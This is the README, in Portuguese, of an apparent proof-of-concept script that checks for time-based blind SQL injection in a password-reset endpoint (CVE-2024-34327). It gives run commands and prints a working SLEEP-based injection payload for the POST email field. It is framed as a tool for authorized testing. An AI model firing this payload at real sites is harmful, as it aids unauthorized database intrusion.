
Verificador de prova de conceito para injeção SQL cega baseada em tempo em password-reset-token.php; envia requisições POST maliciosas e detecta respostas atrasadas para CVE-2024-34327.
Este script (V-24-02-001_SQLi_Check.py) é uma ferramenta de prova de conceito (PoC) para verificar a presença de uma vulnerabilidade de injeção SQL cega baseada em tempo que afeta o endpoint password-reset-token.php, identificada como CVE-2024-34327.
Esta ferramenta destina-se apenas a fins educacionais e testes autorizados. A varredura ou exploração não autorizada de sistemas sem consentimento é ilegal e antiética.
/auth/password-reset-token.phpemail nos dados POSTSLEEP() para medir atraso na resposta do servidorPHPSESSID para cada execuçãorequests (pip install requests)python3 V-24-02-001_SQLi_Check.py --url https://target-domain.com
python3 V-24-02-001_SQLi_Check.py --url https://vulnerable-site.com
[+] VULNERABLE se o atraso na resposta do servidor exceder 9 segundos[-] NOT VULNERABLE caso contráriodata[email][email protected]'+AND+(SELECT+8161+FROM+(SELECT(SLEEP(10)))uvHC)+AND+'abcd'='abcd
requests do PythonUser-Agent e Referer realistasVocê é responsável pelo uso ético desta ferramenta. O autor não assume nenhuma responsabilidade por qualquer uso indevido.
Pesquisador de Segurança – [Seu Nome ou Pseudônimo]
Sinta-se livre para contribuir ou relatar problemas.